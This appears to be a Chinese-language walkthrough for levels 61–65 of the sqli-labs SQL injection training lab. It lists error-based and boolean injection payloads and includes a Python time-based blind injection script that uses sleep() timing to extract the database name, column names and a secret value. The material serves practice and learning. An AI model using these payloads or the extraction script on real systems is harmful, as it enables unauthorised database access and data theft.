61
payload:?id=1')) and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
62
payload:?id=1') and (length(database())=10) %23
或者
payload:?id=1' and (length(database())=10) and '1'='1
本题次数限制130次,爆破是没办法了。
import requests
import time
chSet = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
res = ""
def binary(start, end, process, index=0):
# 本质上是一种迭代,以递归的形式写
# process是一个函数
global res
if start >= end:
res += chSet[start]
return 0
mid = (start + end) // 2
if index:
temp = process(ord(chSet[mid]), index)
else:
temp = process(mid)
if temp == 1:
if index:
binary(start, mid, process, index)
else:
binary(start, mid, process)
elif temp == -1:
if index:
binary(mid+1, end, process, index)
else:
binary(mid+1, end, process)
def getDatabase(chrAscii, index):
url = "http://localhost/Less-10/?id=1%22%20"
payload = "and%20if(ascii(substr(database(),{},1))<={},\
sleep(1),0)--+".format(index, chrAscii)
timeStart = time.time()
requests.get(url=url+payload)
if time.time() - timeStart > 1:
return 1
else:
return -1
def getLen(index):
url = "http://localhost/Less-10/?id=1%22%20"
payload = "and%20if(length(select)<={},\
sleep(1),0)--+".format(index)
timeStart = time.time()
requests.get(url=url+payload)
if time.time() - timeStart > 1:
return 1
else:
return -1
def getKeyCol(chrAscii, index):
url = "http://192.168.124.4/Less-62/?id=1%27)%20"
payload = "and%20if(ascii(substr((select column_name from information_schema.columns where table_name='0a3tw0cifu' limit 2,1),{},1))<={},\
sleep(1),0)--+".format(index, chrAscii)
timeStart = time.time()
requests.get(url=url+payload)
if time.time() - timeStart > 1:
return 1
else:
return -1
def getKey(chrAscii, index):
url = "http://192.168.124.4/Less-62/?id=1%27)%20"
payload = "and%20if(ascii(substr((select secret_E6PD from 0a3tw0cifu),{},1))<={},\
sleep(1),0)--+".format(index, chrAscii)
timeStart = time.time()
requests.get(url=url+payload)
if time.time() - timeStart > 1:
return 1
else:
return -1
if __name__ == "__main__":
for i in range(0, 24):
binary(0, 61, getKey, i+1)
print(res)
布尔盲注和时间盲注均可,以上是时间盲注脚本
63
payload:?id=1' and (length(database())=10) %23
64
payload:?id=1)) and (length(database())=10) %23
65
payload:?id=1") and (length(database())=10) %23
文章评论